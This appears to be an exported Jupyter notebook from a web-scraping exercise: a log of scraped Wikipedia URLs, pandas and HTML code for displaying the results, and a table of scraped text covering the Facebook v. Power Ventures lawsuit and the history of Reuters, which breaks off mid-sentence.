tables: https://en.wikipedia.org/wiki/Programmers Scraped text only: https://en.wikipedia.org/wiki/Web_data_integration Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-8 Scraped text and tables: https://www.wikidata.org/wiki/Special:EntityPage/Q665452#sitelinks-wikipedia Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Text_pattern_matching Scraped text and tables: https://en.wikipedia.org/wiki/Web_page Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-29 Scraped text only: https://en.wikipedia.org/wiki/Help:Introduction Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=8 Scraped text and tables: https://en.wikipedia.org/wiki/Data_extraction Scraped text and tables: https://en.wikipedia.org/wiki/Data_storage Scraped text and tables: https://en.wikipedia.org/wiki/HiQ_Labs_v._LinkedIn Scraped text and tables: https://en.wikipedia.org/wiki/Antivirus_software Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Technical_variants Scraped text and tables: https://en.wikipedia.org/wiki/Importer_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Information_warfare Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy Scraped text and tables: https://en.wikipedia.org/wiki/Automation Scraped text and tables: https://en.wikipedia.org/wiki/Automotive_security Non-HTML content type for http://www.webstartdesign.com.au/spam_business_practical_guide.pdf: application/pdf Scraped text and tables: https://en.wikipedia.org/wiki/Cyberwarfare Scraped text and tables: https://en.wikipedia.org/wiki/Object-oriented_programming Scraped text and tables: https://en.wikipedia.org/wiki/Main_Page Scraped text and tables: https://en.wikipedia.org/wiki/Feist_Publications,_Inc.,_v._Rural_Telephone_Service_Co. Scraped text and tables: https://en.wikipedia.org/wiki/Internet_Archive Failed to scrape https://api.semanticscholar.org/CorpusID:237719804: Status code 202 Scraped text and tables: https://en.wikipedia.org/wiki/Special:BookSources/978-1-5386-8260-9 Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:File_upload_wizard Scraped text and tables: https://en.wikipedia.org/wiki/S2CID_(identifier) Scraped text only: https://www.google.com/search?tbs=bks:1&q=%22Web+scraping%22+-wikipedia Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Techniques Scraped text and tables: https://en.wikipedia.org/wiki/Display_device Failed to scrape http://groups.csail.mit.edu/uid/projects/sikuli/sikuli-uist2009.pdf: Status code 500 Scraped text and tables: https://en.wikipedia.org/wiki/Secure_by_design Scraped text and tables: https://en.wikipedia.org/wiki/Botnet Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:DownloadAsPdf&page=Web_scraping&action=show-download-screen Scraped text only: https://donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&utm_medium=sidebar&utm_campaign=C13_en.wikipedia.org&uselang=en Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement Scraped text and tables: https://en.wikipedia.org/wiki/Computer_virus Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_with_short_description Scraped text and tables: https://en.wikipedia.org/wiki/File:CIAJMK1209-en.svg Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_with_limited_geographic_scope_from_October_2015 Scraped text only: https://en.wikipedia.org/wiki/End-user_(computer_science) Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:CreateAccount&returnto=Web+scraping Scraped text and tables: https://en.wikipedia.org/wiki/Data_recovery Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-22 Scraped text and tables: https://en.wikipedia.org/wiki/Knowledge_extraction Scraped text only: https://stats.wikimedia.org/#/en.wikipedia.org Scraped text and tables: https://en.wikipedia.org/wiki/Help:Maintenance_template_removal Scraped text and tables: https://en.wikipedia.org/wiki/Data_corruption Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:CiteThisPage&page=Web_scraping&id=1240545829&wpFormIdentifier=titleform Scraped text only: https://www.mediawiki.org Scraped text and tables: https://en.wikipedia.org/wiki/Robots_exclusion_standard Scraped text and tables: https://en.wikipedia.org/wiki/Python_(programming_language) Scraped text and tables: https://en.wikipedia.org/wiki/Multi-factor_authentication Scraped text and tables: https://en.wikipedia.org/wiki/Electromagnetic_warfare Scraped text only: https://en.wikipedia.org/wiki/Terms_of_service Scraped text and tables: https://ko.wikipedia.org/wiki/%EB%8D%B0%EC%9D%B4%ED%84%B0_%EC%8A%A4%ED%81%AC%EB%A0%88%EC%9D%B4%ED%95%91 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-28 Scraped text only: http://www.xconomy.com/san-francisco/2012/07/25/diffbot-is-using-computer-vision-to-reinvent-the-semantic-web/ Scraped text and tables: https://en.wikipedia.org/wiki/Firewall_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-21 Scraped text only: https://it.wikipedia.org/wiki/Web_scraping Scraped text only: https://en.wikipedia.org/wiki/Category:Data_processing Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-26 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#References Scraped text and tables: https://en.wikipedia.org/wiki/Special:RecentChanges Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Web_Scraping_Platforms Scraped text and tables: https://hdl.handle.net/1822%2F32460 Scraped text and tables: https://en.wikipedia.org/wiki/Template:Information_security Scraped text only: https://wikimediafoundation.org/ Scraped text and tables: https://en.wikipedia.org/wiki/Information_privacy Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:QrCode&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FWeb_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Category:CS1_Danish-language_sources_(da) Scraped text and tables: https://en.wikipedia.org/wiki/Blog_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Human_copy-and-paste Scraped text only: https://is.wikipedia.org/wiki/Vefs%C3%B6fnun Scraped text and tables: https://www.wikidata.org/wiki/Special:EntityPage/Q521850#sitelinks-wikipedia Scraped text and tables: https://en.wikipedia.org/wiki/Application_programming_interface Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=4 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-10 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=11 Scraped text and tables: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:About Scraped text and tables: https://en.wikipedia.org/wiki/Authorization Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-22 Scraped text and tables: https://en.wikipedia.org/wiki/World_Wide_Web
final_data['scraped_text'] = final_data['scraped_text'].str.strip()
final_data = final_data[final_data['scraped_text'] != '']
# Reset the indexes first to ensure the indexes correctly reflect the row positions.
final_data.reset_index(drop=True, inplace=True)
# Save the object containing the scraped data so that you do not need to re-scrape the same data in the future.
import pickle
# pickle.dump(final_data, open('final_data.pkl', 'wb'))
# final_data = pickle.load(open('final_data.pkl', 'rb'))
import pandas as pd
pd.set_option('display.max_rows', None) # Print all rows. If this line is not used, only the first and last 5 rows will be shown
pd.set_option('display.max_colwidth', None) # Prevent column width truncation
print(final_data[["original_url", "scraped_url", "scraped_text"]]) # Running the code in print() will hide any escape characters
IOPub data rate exceeded. The notebook server will temporarily stop sending output to the client in order to avoid crashing it. To change this limit, set the config variable `--NotebookApp.iopub_data_rate_limit`. Current values: NotebookApp.iopub_data_rate_limit=1000000.0 (bytes/sec) NotebookApp.rate_limit_window=3.0 (secs)
$
signs that could otherwise alter the font styling in the display.¶from IPython.display import display, HTML
import html
import pandas as pd
# Print all rows. If this line is not used, only the first and last 5 rows will be shown
pd.set_option('display.max_rows', None)
# Set the maximum column width to None to prevent truncation
pd.set_option('display.max_colwidth', None)
from html import unescape
# Explanation of the wrap_in_pre() function:
# 1) I use the unescape() function from the html module in wrap_in_pre() to unescape any previously escaped HTML entities
# in the text. This step gracefully handles backslahes. E.g., it ensures any backslash followed by an apostrophe (\') is
# correctly converted back to a simple apostrophe (').
# 2) The <pre> tags ensure all text within them is treated as plain text by the browser. This included special characters
# like dollar signs, preventing them from being interpreted in ways that could alter their appearance or introduce
# unwanted formatting.
# Function to wrap text in <pre> tags and escape it
def wrap_in_pre(text):
# Unescape any previously escaped HTML entities
text = unescape(text)
# Check if the text is already wrapped in <pre> tags
if text.startswith('<pre>') and text.endswith('</pre>'):
return text # If already wrapped, return as is
return f"<pre>{html.escape(text)}</pre>" # Wrap in <pre> tags and escape
# Apply the function to your DataFrame column
final_data['scraped_text'] = final_data['scraped_text'].apply(wrap_in_pre)
# Render the DataFrame with the new wrapped text
styled_df = final_data[['original_url', 'scraped_url', 'scraped_text']].style.set_properties(**{
'text-align': 'left',
'vertical-align': 'top',
'white-space': 'normal',
'font-family': 'Georgia, serif',
'font-size': '16px',
'line-height': '1.6',
'font-weight': 'normal',
'font-style': 'normal',
'word-break': 'normal'
}).set_table_styles([
{'selector': 'th, td',
'props': [('text-align', 'left'), ('vertical-align', 'top'), ('white-space', 'normal'), ('word-wrap', 'break-word')]},
{'selector': 'th:nth-child(1), td:nth-child(1)', # Apply styles to the first column
'props': [('max-width', '120px')]},
{'selector': 'th:nth-child(2), td:nth-child(2)', # Apply styles to the second column
'props': [('max-width', '140px')]},
{'selector': 'th:nth-child(3), td:nth-child(3)', # Apply styles to the third column
'props': [('max-width', '200px')]}
])
from html import unescape
# Now, strip the inserted <pre> and </pre> tags and unescape HTML entities in case you later need to work with the data
# in its original form. This undoes what wrap_in_pre() did above. This is important because wrap_in_pre() introduced special
# formatting for display purposes.
def strip_pre_tags_and_unescape(text):
# Remove the <pre> and </pre> tags if they exist
if text.startswith('<pre>') and text.endswith('</pre>'):
text = text[5:-6] # Remove the <pre> and </pre> tags
# Unescape any HTML entities in the text
text = unescape(text)
return text
# Apply the function to your DataFrame column
final_data['scraped_text'] = final_data['scraped_text'].apply(strip_pre_tags_and_unescape)
# Modify the div as follows
html_rendered_dataframe = f"""
<div style='max-height: 400px; overflow-x: auto; overflow-y: auto; border: 1px solid #ccc; padding: 10px; font-family: Georgia, serif; font-size: 16px;'>
<style>
table {{
display: block;
overflow-x: auto;
max-width: 100%;
white-space: nowrap;
}}
th, td {{
font-style: normal !important;
font-weight: normal !important;
font-family: Georgia, serif !important;
font-size: 16px !important;
}}
</style>
{styled_df.to_html(escape=False)}
</div>
"""
# Display the scrollable styled DataFrame
display(HTML(html_rendered_dataframe))
original_url | scraped_url | scraped_text | |
---|---|---|---|
0 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Facebook,_Inc._v._Power_Ventures,_Inc. | Facebook, Inc. v. Power Ventures, Inc. is a lawsuit brought by Facebook in the United States District Court for the Northern District of California alleging that Power Ventures Inc., a third-party platform, collected user information from Facebook and displayed it on their own website. Facebook claimed violations of the CAN-SPAM Act, the Computer Fraud and Abuse Act ("CFAA"), and the California Comprehensive Computer Data Access and Fraud Act. 1 According to Facebook, Power Ventures Inc. made copies of Facebook's website during the process of extracting user information. Facebook argued that this process causes both direct and indirect copyright infringement. In addition, Facebook alleged this process constitutes a violation of the Digital Millennium Copyright Act ("DMCA"). Finally, Facebook also asserted claims of both state and federal trademark infringement, as well as a claim under California's Unfair Competition Law ("UCL"). Power Ventures previously operated the domain power.com and used it to create a website that enabled its users to aggregate data about themselves that is otherwise spread across various social networking sites and messaging services, including LinkedIn, Twitter, Myspace, and AOL or Yahoo instant messaging. This aggregation method is embodied in its motto: "all your friends in just one place". 2 Power Ventures wanted to provide a single site for its customers to see all of their friends, to view their status updates or profile pages, and to send messages to multiple friends on multiple sites. 3 The litigation focuses on Power Ventures alleged "scraping" of content for and from users on Facebook into Power Ventures interface. Facebook sued claiming violations of copyright, DMCA, CAN-SPAM, and CFAA. 4 5 Power Ventures and Facebook tried unsuccessfully to work out a deal that allowed Power Ventures to access Facebook's site, through Facebook Connect. In late December 2008, Power Ventures informed Facebook that it would continue to operate without using Facebook Connect. Power Ventures allegedly continued to "scrape" Facebook's website, despite technological security measures to block such access. 4 Facebook sued Power Ventures Inc. in the Northern District of California. The court's ruling addressed a motion to dismiss the copyright, DMCA, trademark, and UCL claims. When a court considers a motion to dismiss, it must take the allegations in the Plaintiff's complaint as true and construe the Complaint in a manner that is favorable to the Plaintiff. Thus, for a motion to dismiss to succeed, the complaint must lack either a cognizable legal theory or sufficient facts to support the legal theory. 6 To state a claim for copyright infringement, a plaintiff need only allege The First Amended Complaint ("FAC") alleged that Power Ventures accessed Facebook's website and made unauthorized "cache" copies of it or created derivative works derived from the Facebook website. However, Power Ventures contended that Facebook's copyright allegations are deficient because it is unclear which portions of Facebook's website are alleged to have been copied. Facebook argued that it need not define the exact contours of the protected material because copyright claims do not require particularized allegations. Since Facebook owns the copyright to any page within its system (including the material located on those pages besides user content, such as graphics, video and sound files), Power Ventures only has to access and copy one page to commit copyright infringement. 4 Facebook conceded that it did not have any proprietary rights in its users' information. Power Ventures users, who own the rights to the information sought, have expressly given them permission to gather this information. 4 5 Judge Fogel reasoned that MAI Systems Corp. v. Peak Computer, Inc. and Ticketmaster LLC v. RMG Techs. Inc. indicated that the scraping of a webpage inherently involves the copying of that webpage into a computer's memory in order to extract the underlying information contained therein. Even though this "copying" is ephemeral and momentary, that it is enough to constitute a "copy" under 106 of the Copyright Act and therefore infringement. 7 Since Facebook's Terms of Service prohibit scraping (and thus, Facebook has not given any license to third parties or users to do so), the copying happens without permission. 5 In the MAI case, the Court granted summary judgment in favor of MAI on its claims of copyright infringement and issued a permanent injunction against Peak. The alleged copyright violations included: In this particular case, the Court held that Ticketmaster LLC ("Ticketmaster") was likely to prevail on claims of direct and contributory copyright infringement as a result of defendant RMG Technologies Inc. ("RMG") distribution of a software application that permitted its clients to circumvent Ticketmaster.com's CAPTCHA access controls, and use Ticketmaster's copyrighted website in a manner that violated the site's Terms of Use. The Court held that RMG was likely to be found guilty of direct copyright infringement because when RMG viewed the site to create and test its product, it made unauthorized copies of Ticketmaster's site in its computer's RAM. 9 In the instant case, the Court followed Ticketmaster to determine that Power Ventures' 'scraping' made an actionable "cache" copy of a Facebook profile page each time it accessed a user's profile page. 4 The elements necessary to state a claim under the DMCA are Power Ventures argued that Facebook's DMCA claim was insufficient using the same arguments listed above. They also argued that the unauthorized use requirement was not met because the users are controlling the access (via Power Ventures site) to their own content on the Facebook website. However, the Terms of Use negate this argument because users are barred from using automated programs to access the Facebook website. While users may have the copyright rights in their own content, Facebook placed conditions on that access. After Power Ventures informed Facebook that it intended to continue their service without using Facebook Connect, Facebook implemented specific technical measures to block Power Ventures' access. Power Ventures then attempted to circumvent those technological measures. As all of the elements of a DMCA claim had been correctly pleaded and supported in the FAC, the motion to dismiss the DMCA claim was denied. 4 The Lanham Act imposes liability upon any person who Facebook stated that they were the registered owner of the FACEBOOK mark since 2004. Furthermore, they alleged that Power Ventures used the mark in connection with Power Ventures business. Facebook never authorized or consented to Power Ventures' use of the mark. Facebook also stated that Power Ventures' unauthorized use of the mark was likely to "confuse recipients and lead to the false impression that Facebook is affiliated with, endorses, or sponsors" Power Ventures. Power Ventures countered that Facebook was required to provide concise information in the Complaint with respect to the trademark infringement allegations, including information about each instance of such use. However, since particularized pleading is not required for trademark infringement claims, Facebook's allegations were sufficient to survive Power Ventures' motion to dismiss the trademark infringement claim. 4 To state a claim of trademark infringement under California common law, a plaintiff need only allege For the same reasons listed above, the Court also denied Power Ventures' motion to dismiss the state trademark claim. California's UCL jurisprudence had previously found Lanham Act claims to be substantially congruent to UCL claims. However, it was unclear as to whether Facebook was relying on it trade dress claims or if it also intended to incorporate other portions of the FAC, such as those dealing with the CAN-SPAM and CFAA claims. In order to promote an efficient docket, the Court granted Power Ventures' motion for a more definite statement. 4 On February 18, 2011 11 the judge granted the parties' stipulation to dismiss Facebook's DMCA claim, copyright and trademark infringement claims, and claims for violations of California Business and Professions Code Section 17200. Only three claims remained for the final order - the violation of the CAN-SPAM Act, violation of the CFAA and California Penal Code. The district court then granted summary judgment to Facebook on all three of the remaining Facebook claims. The district court awarded statutory damages of $3,031,350, compensatory damages, and permanent injunctive relief, and it held that Vachani 1064 1064 was personally liable for Power's actions. A magistrate judge ordered Power to pay $39,796.73 in costs and fees for a renewed Federal Civil Procedure Rule 30(b)(6) deposition. Power filed a motion for reconsideration, which the district court denied. Defendants timely appeal both the judgment and the discovery sanctions. Argued and Submitted December 9, 2015 San Francisco, California. Filed July 12, 2016 and Amended December 9, 2016. The appeals court affirmed the district court's holding that Vachani was personally liable for Power's actions. 12 Vachani was the central figure in Power's promotional scheme. First, Vachani admitted that, during the promotion, he controlled and directed Power's actions. Second, Vachani admitted that the promotion was his idea. It is undisputed, therefore, that Vachani was the guiding spirit and central figure in Power's challenged actions. Accordingly, we affirm the district court's holding on Vachani's personal liability for Power's actions. The court also affirmed discovery sanctions imposed against Power for non-compliance during a Rule 30(b)(6) deposition. Defendants failed to object to discovery sanctions in the district court. Failure to object forfeits Defendants' right to raise the issue on appeal. On April 24, 2017, Defendant Steven Vachani ("Vachani") filed a motion to stay all proceedings in the case pending resolution of his petition for certiorari in the United States Supreme Court. However, the Ninth Circuit has held that "once a federal circuit court issues a decision, the district courts within that circuit are bound to follow it and have no authority to await a ruling by the Supreme Court before applying the circuit court's decision as binding authority. 13 On May 2, 2017, the United States District Court, N.D. California, San Jose Division issued its final judgement ruled that, having considered the briefing of the parties, the record in the case, and the relevant law, the Court found that Facebook was only entitled to the reduced sum of $79,640.50 in compensatory damages and a permanent injunction. The Court also ordered Defendants to pay the $39,796.73 discovery sanction. 14 |
1 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Reuters | Reuters ( r t rz ROY-terz) is a news agency owned by Thomson Reuters. 1 2 It employs around 2,500 journalists and 600 photojournalists in about 200 locations worldwide writing in 16 languages. 3 Reuters is one of the largest and most trusted news agencies in the world. 4 5 6 The agency was established in London in 1851 by the German-born Paul Reuter. It was acquired by the Thomson Corporation of Canada in 2008 and now makes up the news media division of Thomson Reuters. 5 Paul Reuter worked at a book-publishing firm in Berlin and was involved in distributing radical pamphlets at the beginning of the Revolutions of 1848. These publications brought much attention to Reuter, who in 1850 developed a prototype news service in Aachen using homing pigeons and electric telegraphy from 1851 on, in order to transmit messages between Brussels and Aachen, 7 in what today is Aachen's Reuters House. Reuter moved to London in 1851 and established a news wire agency at the London Royal Exchange. Headquartered in London, Reuter's company initially covered commercial news, serving banks, brokerage houses, and business firms. 8 The first newspaper client to subscribe was the London Morning Advertiser in 1858, and more began to subscribe soon after. 8 9 According to the Encyclop dia Britannica: "the value of Reuters to newspapers lay not only in the financial news it provided but in its ability to be the first to report on stories of international importance. 8 It was the first to report Abraham Lincoln's assassination in Europe, for instance, in 1865. 8 10 In 1865, Reuter incorporated his private business, under the name Reuter's Telegram Company Limited; Reuter was appointed managing director of the company. 11 In 1870 the press agencies French Havas (founded in 1835), British Reuter's (founded in 1851) and German Wolff (founded in 1849) signed an agreement (known as the Ring Combination) that set 'reserved territories' for the three agencies. Each agency made its own separate contracts with national agencies or other subscribers within its territory. In practice, Reuters, who came up with the idea, tended to dominate the Ring Combination. Its influence was greatest because its reserved territories were larger or of greater news importance than most others. It also had more staff and stringers throughout the world and thus contributed more original news to the pool. British control of cable lines made London itself an unrivalled centre for world news, further enhanced by Britain's wide-ranging commercial, financial and imperial activities. 12 In 1872, Reuter's expanded into the Far East, followed by South America in 1874. Both expansions were made possible by advances in overland telegraphs and undersea cables. 10 In 1878, Reuter retired as managing director, and was succeeded by his eldest son, Herbert de Reuter. 11 In 1883, Reuter's began transmitting messages electrically to London newspapers. 10 Reuter's son Herbert de Reuter continued as general manager until his death by suicide in 1915. The company returned to private ownership in 1916, when all shares were purchased by Roderick Jones and Mark Napier; they renamed the company "Reuters Limited", dropping the apostrophe. 11 In 1919, a number of Reuters reports falsely described the anti-colonial March 1st Movement protests in Korea as violent Bolshevik uprisings. South Korean researchers found that a number of these reports were cited in a number of international newspapers and possibly negatively influenced international opinion on Korea. 13 In 1923, Reuters began using radio to transmit news internationally, a pioneering act. 10 In 1925, the Press Association (PA) of Great Britain acquired a majority interest in Reuters, and full ownership some years later. 8 During the world wars, The Guardian reported that Reuters: "came under pressure from the British government to serve national interests. In 1941, Reuters deflected the pressure by restructuring itself as a private company. 10 In 1941, the PA sold half of Reuters to the Newspaper Proprietors' Association, and co-ownership was expanded in 1947 to associations that represented daily newspapers in New Zealand and Australia. 8 The new owners formed the Reuters Trust. The Reuters Trust Principles were put in place to maintain the company's independence. 14 At that point, Reuters had become "one of the world's major news agencies, supplying both text and images to newspapers, other news agencies, and radio and television broadcasters. 8 Also at that point, it directly or through national news agencies provided service "to most countries, reaching virtually all the world's leading newspapers and many thousands of smaller ones", according to Britannica. 8 In 1961, Reuters scooped news of the erection of the Berlin Wall. 15 Reuters was one of the first news agencies to transmit financial data over oceans via computers in the 1960s. 8 In 1973, Reuters "began making computer-terminal displays of foreign-exchange rates available to clients. 8 In 1981, Reuters began supporting electronic transactions on its computer network and afterwards developed a number of electronic brokerage and trading services. 8 Reuters was floated as a public company in 1984, 15 when Reuters Trust was listed on the stock exchanges 10 such as the London Stock Exchange (LSE) and NASDAQ. 8 Reuters later published the first story of the Berlin Wall being breached in 1989. 15 Reuters was the dominant news service on the Internet in the 1990s. It earned this position by developing a partnership with ClariNet and Pointcast, two early Internet-based news providers. 16 Reuters' share price grew during the dotcom boom, then fell after the banking troubles in 2001. 10 In 2002, Britannica wrote that most news throughout the world came from three major agencies: the Associated Press, Reuters, and Agence France-Presse. 4 Until 2008, the Reuters news agency formed part of an independent company, Reuters Group plc. Reuters was acquired by Thomson Corporation in Canada in 2008, forming Thomson Reuters. 8 In 2009, Thomson Reuters withdrew from the LSE and the NASDAQ, instead listing its shares on the Toronto Stock Exchange (TSX) and the New York Stock Exchange (NYSE). 8 The last surviving member of the Reuters family founders, Marguerite, Baroness de Reuter, died at age 96 on 25 January 2009. 17 The parent company Thomson Reuters is headquartered in Toronto, and provides financial information to clients while also maintaining its traditional news-agency business. 8 In 2012, Thomson Reuters appointed Jim Smith as CEO. 14 In July 2016, Thomson Reuters agreed to sell its intellectual property and science operation for $3.55 billion to private equity firms. 18 In October 2016, Thomson Reuters announced expansions and relocations to Toronto. 18 As part of cuts and restructuring, in November 2016, Thomson Reuters Corp. eliminated 2,000 jobs worldwide out of its estimated 50,000 employees. 18 On 15 March 2020, Steve Hasker was appointed president and CEO. 19 In April 2021, Reuters announced that its website would go behind a paywall, following rivals who have done the same. 20 21 In March 2024, Gannett, the largest newspaper publisher in the United States, signed an agreement with Reuters to use the wire service's global content after cancelling its contract with the Associated Press. 22 In 2024, Reuters staff won the Pulitzer Prize for National Reporting for their work on Elon Musk and misconduct at his businesses, including SpaceX, Tesla, and Neuralink, as well as the Pulitzer Prize for Breaking News Photography for coverage of the Israel Hamas war. 23 Reuters employs some 2,500 journalists and 600 photojournalists 24 in about 200 locations worldwide. 25 26 5 Reuters journalists use the Standards and Values as a guide for fair presentation and disclosure of relevant interests, to "maintain the values of integrity and freedom upon which their reputation for reliability, accuracy, speed and exclusivity relies". 27 28 In May 2000, Kurt Schork, an American reporter, was killed in an ambush while on assignment in Sierra Leone. In April and August 2003, news cameramen Taras Protsyuk and Mazen Dana were killed in separate incidents by U.S. troops in Iraq. In July 2007, Namir Noor-Eldeen and Saeed Chmagh were killed when they were struck by fire from a U.S. military Apache helicopter in Baghdad. 29 30 During 2004, cameramen Adlan Khasanov was killed by Chechen separatists, and Dhia Najim was killed in Iraq. In April 2008, cameraman Fadel Shana was killed in the Gaza Strip after being hit by an Israeli tank. 31 32 While covering China's Cultural Revolution in Peking in the late 1960s for Reuters, journalist Anthony Grey was detained by the Chinese government in response to the jailing of several Chinese journalists by the colonial British government of Hong Kong. 33 He was released after being imprisoned for 27 months from 1967 to 1969 and was awarded an OBE by the British Government. After his release, he went on to become a best-selling historical novelist. 34 In May 2016, the Ukrainian website Myrotvorets published the names and personal data of 4,508 journalists, including Reuters reporters, and other media staff from all over the world, who were accredited by the self-proclaimed authorities in the separatist-controlled regions of eastern Ukraine. 35 In 2018, two Reuters journalists were convicted in Myanmar of obtaining state secrets while investigating a massacre in a Rohingya village. 36 The arrest and convictions were widely condemned as an attack on press freedom. The journalists, Wa Lone and Kyaw Soe Oo, received several awards, including the Foreign Press Association Media Award and the Pulitzer Prize for International Reporting, and were named as part of the Time Person of the Year for 2018 along with other persecuted journalists. 37 38 39 After 511 days in prison, Wa Lone and Kyaw Soe Oo were freed on 7 March 2019 after receiving a presidential pardon. 40 In February 2023, a team of Reuters journalists won the Selden Ring Award for their investigation that exposed human-rights abuses by the Nigerian military. 41 In 1977, Rolling Stone and The New York Times said that according to information from CIA officials, Reuters cooperated with the CIA. 43 44 45 In response to that, Reuters' then-managing director, Gerald Long, had asked for evidence of the charges, but none was provided, according to Reuters' then-managing editor for North America, 45 Desmond Maberly. 46 47 Reuters has a policy of taking a "value-neutral approach" which extends to not using the word terrorist in its stories. The practice attracted criticism following the September 11 attacks. 48 Reuters' editorial policy states: "Reuters may refer without attribution to terrorism and counterterrorism in general, but do not refer to specific events as terrorism. Nor does Reuters use the word terrorist without attribution to qualify specific individuals, groups or events. 49 By contrast, the Associated Press does use the term terrorist in reference to non-governmental organizations who carry out attacks on civilian populations. 48 In 2004, Reuters asked CanWest Global Communications, a Canadian newspaper chain, to remove Reuters' bylines, as the chain had edited Reuters articles to insert the word terrorist. A spokesman for Reuters stated: "My goal is to protect my reporters and protect our editorial integrity. 50 In July 2013, David Fogarty, former Reuters climate change correspondent in Asia, resigned after a career of almost 20 years with the company and wrote that "progressively, getting any climate change-themed story published got harder" following comments from then-deputy editor-in-chief Paul Ingrassia that he was a "climate change sceptic". In his comments, Fogarty stated: 51 52 53 By mid-October, I was informed that climate change just wasn't a big story for the present, but that it would be if there was a significant shift in global policy, such as the US introducing an emissions cap-and-trade system. Very soon after that conversation I was told my climate change role was abolished. Ingrassia, formerly Reuters' managing editor, previously worked for The Wall Street Journal and Dow Jones for 31 years. 54 55 Reuters responded to Fogarty's piece by stating: "Reuters has a number of staff dedicated to covering this story, including a team of specialist reporters at Point Carbon and a columnist. There has been no change in our editorial policy. 56 Subsequently, climate blogger Joe Romm cited a Reuters article on climate as employing "false balance", and quoted Stefan Rahmstorf, co-chair of Earth System Analysis at the Potsdam Institute that s imply, a lot of unrelated climate sceptics nonsense has been added to this Reuters piece. In the words of the late Steve Schneider, this is like adding some nonsense from the Flat Earth Society to a report about the latest generation of telecommunication satellites. It is absurd. Romm opined: "We can't know for certain who insisted on cramming this absurd and non-germane 'climate sceptics nonsense' into the piece, but we have a strong clue. If it had been part of the reporter's original reporting, you would have expected direct quotes from actual sceptics, because that is journalism 101. The fact that the blather was all inserted without attribution suggests it was added at the insistence of an editor. 57 According to Ynetnews, Reuters was accused of bias against Israel in its coverage of the 2006 Israel Lebanon conflict after the wire service used two doctored photos by a Lebanese freelance photographer, Adnan Hajj. 58 In August 2006, Reuters announced it had severed all ties with Hajj and said his photographs would be removed from its database. 59 60 In 2010, Reuters was criticised again by Haaretz for "anti-Israeli" bias when it cropped the edges of photos, removing commandos' knives held by activists and a naval commando's blood from photographs taken aboard the Mavi Marmara during the Gaza flotilla raid, a raid that left nine Turkish activists dead. It has been alleged that in two separate photographs, knives held by the activists were cropped out of the versions of the pictures published by Reuters. 61 Reuters said it is standard operating procedure to crop photos at the margins, and replaced the cropped images with the original ones after it was brought to the agency's attention. 61 On 9 June 2020, three Reuters journalists (Jack Stubbs, Raphael Satter and Christopher Bing) incorrectly used the image of an Indian herbal medicine entrepreneur in an exclusive story titled "Obscure Indian cyber firm spied on politicians, investors worldwide". 62 Indian local media picked up the report, and the man whose image was wrongly used was invited and interrogated for nine hours by Indian police. Reuters admitted to the error, but Raphael Satter claimed that they had mistaken the man for the suspected hacker Sumit Gupta because both men share same business address. A check by local media, however, showed that both men were in different buildings and not as claimed by Raphael Satter. 63 64 As the report of the inaccurate reporting trickled out to the public, Reuters' senior director of communication Heather Carpenter contacted media outlets asking them to take down their posts. 64 In March 2015, the Brazilian affiliate of Reuters released an excerpt from an interview with Brazilian ex-president Fernando Henrique Cardoso about Operation Car Wash (Portuguese: Opera o Lava Jato). In 2014, several politicians from Brazil were found to be involved in corruption, by accepting bribes from different corporations in exchange for Government contracts. After the scandal, the excerpt from Brazil's president Fernando Henrique's interview was released. One paragraph by a former Petrobras manager mentioned a comment, in which he suggested corruption in the company may date back to Cardoso's presidency. Attached, was a comment between parenthesis: "Podemos tirar se achar melhor" ("we can take it out if you think better"), 65 which was removed from the current version of the text. 66 This had the effect of confusing readers, and suggests that the former president was involved in corruption and the comment was attributed to him. Reuters later confirmed the error, and explained that the comment, originating from one of the local editors, was actually intended for the journalist who wrote the original text in English, and that it should not have been published. 67 In November 2019 the UK Foreign Office released archive documents confirming that it had provided funding to Reuters during the 1960s and 1970s so that Reuters could expand its coverage in the Middle East. An agreement was made between the Information Research Department (IRD) and Reuters for the UK Treasury to provide 350,000 over four years to fund Reuters' expansion. The UK government had already been funding the Latin American department of Reuters through a shell company; however, this method was discounted for the Middle East operation due to the accounting of the shell company looking suspicious, with the IRD stating that the company "already looks queer to anyone who might wish to investigate why such an inactive and unprofitable company continues to run. 68 Instead, the BBC was used to fund the project by paying for enhanced subscriptions to the news organisation, for which the Treasury would reimburse the BBC at a later date. The IRD acknowledged that this agreement would not give them editorial control over Reuters, although the IRD believed it would give them political influence over Reuters' work, stating "this influence would flow, at the top level, from Reuters' willingness to consult and to listen to views expressed on the results of its work. 68 69 On 1 June 2020, 